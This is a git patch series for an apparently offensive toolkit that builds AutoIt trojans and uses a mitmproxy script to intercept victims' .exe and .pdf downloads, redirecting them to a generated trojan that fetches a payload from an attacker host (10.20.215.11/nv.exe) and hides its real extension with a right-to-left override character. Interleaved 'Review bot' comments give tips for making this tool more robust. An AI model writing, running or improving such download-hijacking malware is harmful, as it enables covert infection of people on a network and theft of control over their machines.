From 6aeab7d9ba5cb4e6b4a547aa878a2837b5ee138d Mon Sep 17 00:00:00 2001 From: moodule Date: Sun, 6 Sep 2020 13:42:28 +0200 Subject: [PATCH 1/5] Ignore temporary build files --- .gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0557015 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +trojan.txt From b5791338c06675bead4f3d66b5acae6b20117e96 Mon Sep 17 00:00:00 2001 From: moodule Date: Sun, 6 Sep 2020 13:55:51 +0200 Subject: [PATCH 2/5] Fix typos --- Trojan.py | 9 +++------ mitmproxy_script.py | 16 +++++++--------- trojan_factory.py | 2 +- 3 files changed, 11 insertions(+), 16 deletions(-) diff --git a/Trojan.py b/Trojan.py index 990b422..bda27a9 100644 --- a/Trojan.py +++ b/Trojan.py @@ -4,7 +4,6 @@ import zipfile - TROJAN_SOURCE_CODE_FILE = "trojan.txt" AUT2EXE = "/root/.wine/drive_c/Program Files (x86)/AutoIt3/Aut2Exe/Aut2exe.exe" @@ -35,8 +34,7 @@ def __init__(self, url1, url2, icon, out_file): file_type = url1.split(".")[-1].replace("#", "") self.icon = self.set_icon(icon, file_type) self.out_file = out_file - - + def create(self): urls = 'Local $urls = "' + self.url1 + "," +self.url2 + '"\n' with open(TROJAN_SOURCE_CODE_FILE, "w") as trojan_file: @@ -44,7 +42,7 @@ def create(self): def compile(self): subprocess.call('wine "' + AUT2EXE + '" /In "' + TROJAN_SOURCE_CODE_FILE + '" /Out "' + self.out_file +'" /Icon "' + self.icon + '"' , shell=True) - + def set_icon(self, icon, file_type): icons_directory = os.path.dirname(os.path.realpath(__file__)) + "/icons" if icon == None: @@ -52,11 +50,10 @@ def set_icon(self, icon, file_type): if not os.path.isfile(icon) : print("[-] Can't find icon at " + icon) - print("[-] Using generaic icon.") + print("[-] Using generic icon.") icon = icons_directory + "/generic.ico" return icon - def zip(self, file_to_zip): os.chdir(os.path.dirname(file_to_zip)) trojan_name = file_to_zip.split("/")[-1] 
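Review bot: The new .gitignore excludes only `trojan.txt`, so Python's `__pycache__/` output stays trackable, and patch 3 of this same series does add `__pycache__/Trojan.cpython-37.pyc` to the tree. Add `__pycache__/` and `*.pyc` next to `trojan.txt` so bytecode caches never land in commits. Note that `Trojan.create()` opens `TROJAN_SOURCE_CODE_FILE` as a relative path, so the `trojan.txt` pattern only helps for runs started from the repository root.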
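Review bot: `compile()` in this hunk still passes a string built from `self.out_file` and `self.icon` to `subprocess.call(..., shell=True)`, and `out_file` is derived from the filename of whatever URL the proxy intercepts (`mitmproxy_script.py` builds it from `flow.request.pretty_url`), so a double quote or shell metacharacter in a requested path breaks the command line or runs commands on the proxy host. Use an argument list instead: `subprocess.call(["wine", AUT2EXE, "/In", TROJAN_SOURCE_CODE_FILE, "/Out", self.out_file, "/Icon", self.icon])`. The same hunk shows `create()` interpolating `url1`/`url2` unescaped into `Local $urls = "..."`, so a `"` or `,` in either URL corrupts the generated AutoIt source, and the return code of the compile call is discarded. Separately, `zip()` calls `os.chdir(os.path.dirname(file_to_zip))` while `create()` writes `TROJAN_SOURCE_CODE_FILE` relative to the working directory, so in a long-running proxy process every `create()` after the first zip appears to write trojan.txt into whatever directory `zip()` last changed into (the `WEB_ROOT` directory in the proxy script) rather than the repository.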
diff --git a/mitmproxy_script.py b/mitmproxy_script.py index 22e411e..a3a4c6d 100644 --- a/mitmproxy_script.py +++ b/mitmproxy_script.py @@ -12,15 +12,14 @@ def request(flow): #code to handle request flows - + if flow.request.host != IP and flow.request.pretty_url.endswith(tuple(TARGET_TEXTENSIONS)): print("[+] Got interesting flow") - + front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0] front_file = flow.request.pretty_url + "#" download_file_name = front_file_name + ".exe" trojan_file = WEB_ROOT + download_file_name - print("[+] Generating a trojan for " + flow.request.pretty_url) @@ -28,17 +27,16 @@ def request(flow): trojan.create() trojan.compile() - if SPOOF_EXTENSION == True: + if SPOOF_EXTENSION: print("[+] Renaming trojan to spoof its extension") front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] if front_file_extension != "exe": new_name = front_file_name + "‮" + "".join(reversed(front_file_extension)) + ".exe" spoofed_file = WEB_ROOT + new_name os.rename(trojan_file, spoofed_file) - + trojan.zip(spoofed_file) download_file_name = front_file_name + ".zip" - - - torjan_download_url = "http://" + IP + "/" + download_file_name - flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": torjan_download_url}) + + trojan_download_url = "http://" + IP + "/" + download_file_name + flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": trojan_download_url}) diff --git a/trojan_factory.py b/trojan_factory.py index 621a617..846449f 100644 --- a/trojan_factory.py +++ b/trojan_factory.py @@ -24,5 +24,5 @@ trojan.create() trojan.compile() -if options.zip: +if options.zip: trojan.zip(options.out_file_path) From ced42c4dcc5d1acce7e5eb8a2f107ffbf31e1d5b Mon Sep 17 00:00:00 2001 
From: moodule Date: Sun, 6 Sep 2020 13:58:31 +0200 Subject: [PATCH 3/5] Remove unused import, lint --- Trojan.py | 4 ++-- __pycache__/Trojan.cpython-37.pyc | Bin 0 -> 2438 bytes mitmproxy_script.py | 5 ++--- trojan_factory.py | 2 +- 4 files changed, 5 insertions(+), 6 deletions(-) create mode 100644 __pycache__/Trojan.cpython-37.pyc diff --git a/Trojan.py b/Trojan.py index bda27a9..d4335b5 100644 --- a/Trojan.py +++ b/Trojan.py @@ -7,7 +7,7 @@ TROJAN_SOURCE_CODE_FILE = "trojan.txt" AUT2EXE = "/root/.wine/drive_c/Program Files (x86)/AutoIt3/Aut2Exe/Aut2exe.exe" -trojan_code = """ +TROJAN_CODE = """ #include #include Local $urlsArray = StringSplit($urls, ",", 2 ) @@ -38,7 +38,7 @@ def __init__(self, url1, url2, icon, out_file): def create(self): urls = 'Local $urls = "' + self.url1 + "," +self.url2 + '"\n' with open(TROJAN_SOURCE_CODE_FILE, "w") as trojan_file: - trojan_file.write(urls + trojan_code) + trojan_file.write(urls + TROJAN_CODE) def compile(self): subprocess.call('wine "' + AUT2EXE + '" /In "' + TROJAN_SOURCE_CODE_FILE + '" /Out "' + self.out_file +'" /Icon "' + self.icon + '"' , shell=True) 
diff --git a/__pycache__/Trojan.cpython-37.pyc b/__pycache__/Trojan.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5a342fa13ce5ede7469ccecb3e91deee659456a4 GIT binary patch literal 2438 zcmZWq-Ez}L6yB9(Sy2)~DTATYAJs4v(bR^}p?|=H28T(9N!t7rsAsd{Ppy-!!UmMYdv_{VC-*t z8I2m0c}#g5B4#nqm|s1)&-J_E8?oWn;+k*9reA-^;(BboVzKqo@U57yF|Y9tV%hS* zQKEPj=54j71`8cg6sptSP4lD^i}bf7h&tbjVoQWO?qZrH(!I9#`E9RrzpsiVb&H;J z-MvIVlf9&k86I)QoXcq*W&JpD@2sg%rO`r>OBLoyw!{9ddne3~(>yMAi6qC-m1Q+ieF0ow2Rhw6))2YwS9kB; z3$Q)TwX_p%B~C=F8Vv)=Jf{2 zLle@98FsHPm%RPYzZggSa*3KKO;GNpmUCrY64}azsBW*cWuk&KD)Q3Q(k}Wc*u)ii zR%yy4+Z3o%CTtQ@B&H$C3GxWki(c|46KAn?EDdEL0g4+HN79%O3dAsY-D( z)Ysdo4&Ls)DD5Cf^Hc@F2Z)!tFK`RL3;YZp%pCiTd?M7J9@Hf!Ff~&1P+}nUj5S$o zG#NAwt=44wTp0>?@zVI?{Jt?XfE8EuCOhPuJw{jgj;*pMcxt=`Gbc(D>}nnH*@4k= zO1|q^ug_naMK8(A=KAW&H}{u=wUv$4g>JC0@}L_mEWrnx{^R7@cM`VfBdiLzoa zp~+r?2hi*Egug|M8R~x!Akv{qkVm{TFxyZE%^yGc*H(!W}5bwS?~biIOj z43GzDPn?GeikUk_oOlz$#cNrQwsBVRA#~9qL6u*1pax Date: Sun, 6 Sep 2020 14:13:20 +0200 Subject: [PATCH 4/5] Generate the trojan directly with the spoofed extension: no need to rename it --- mitmproxy_script.py | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/mitmproxy_script.py b/mitmproxy_script.py index 8b985d3..0707962 100644 --- a/mitmproxy_script.py +++ b/mitmproxy_script.py @@ -16,8 +16,13 @@ def request(flow): print("[+] Got interesting flow") front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0] + front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] + front_file = flow.request.pretty_url + "#" download_file_name = front_file_name + ".exe" + if SPOOF_EXTENSION and front_file_extension != "exe": + print("[+] Renaming trojan to spoof its extension") + download_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension)) + ".exe" trojan_file = WEB_ROOT + download_file_name print("[+] Generating a trojan for " + flow.request.pretty_url) 
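Review bot: The log line added in this hunk, `print("[+] Renaming trojan to spoof its extension")`, no longer describes what happens: after this commit the file is compiled straight to the spoofed name and the `os.rename` is removed. Reword it to `print("[+] Generating trojan with spoofed extension")`. The enclosing `request()` function continues past the end of this hunk.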
@@ -27,15 +32,8 @@ def request(flow): trojan.compile() if SPOOF_EXTENSION: - print("[+] Renaming trojan to spoof its extension") - front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] - if front_file_extension != "exe": - new_name = front_file_name + "".join(reversed(front_file_extension)) + ".exe" - spoofed_file = WEB_ROOT + new_name - os.rename(trojan_file, spoofed_file) - - trojan.zip(spoofed_file) - download_file_name = front_file_name + ".zip" + trojan.zip(trojan_file) + download_file_name = front_file_name + ".zip" trojan_download_url = "http://" + IP + "/" + download_file_name flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": trojan_download_url}) From a796bee10554842406599b7337e21bf703d80987 Mon Sep 17 00:00:00 2001 From: moodule Date: Sun, 6 Sep 2020 14:17:57 +0200 Subject: [PATCH 5/5] Distinguish trojan & download name/url, in case it is zipped --- mitmproxy_script.py | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/mitmproxy_script.py b/mitmproxy_script.py index 0707962..cd1d279 100644 --- a/mitmproxy_script.py +++ b/mitmproxy_script.py @@ -5,7 +5,7 @@ IP = "10.20.215.11" TARGET_TEXTENSIONS = [".exe", ".pdf"] -EVIL_FILE = "http://10.20.215.11/nv.exe" +EVIL_FILE_URL = "http://10.20.215.11/nv.exe" WEB_ROOT = "/var/www/html/" SPOOF_EXTENSION = True 
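Review bot: The zip step is now guarded by `if SPOOF_EXTENSION:` alone, while the spoofed name in the previous hunk is produced only when `SPOOF_EXTENSION and front_file_extension != "exe"`, so a target that already ends in `.exe` is zipped even though nothing was spoofed, whereas the removed code appears to have kept both steps under the same `!= "exe"` condition. If zipping is meant to accompany the spoof only, compute the outcome once, e.g. `spoofed = SPOOF_EXTENSION and front_file_extension != "exe"`, and test that flag both where the name is built and here. `request()` starts before this hunk.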
@@ -18,16 +18,17 @@ def request(flow): front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0] front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] - front_file = flow.request.pretty_url + "#" - download_file_name = front_file_name + ".exe" + front_file_url = flow.request.pretty_url + "#" + trojan_file_name = front_file_name + ".exe" + download_file_name = trojan_file_name if SPOOF_EXTENSION and front_file_extension != "exe": print("[+] Renaming trojan to spoof its extension") - download_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension)) + ".exe" - trojan_file = WEB_ROOT + download_file_name + trojan_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension)) + ".exe" + trojan_file = WEB_ROOT + trojan_file_name print("[+] Generating a trojan for " + flow.request.pretty_url) - trojan = Trojan(front_file, EVIL_FILE, None, trojan_file) + trojan = Trojan(front_file_url, EVIL_FILE_URL, None, trojan_file) trojan.create() trojan.compile()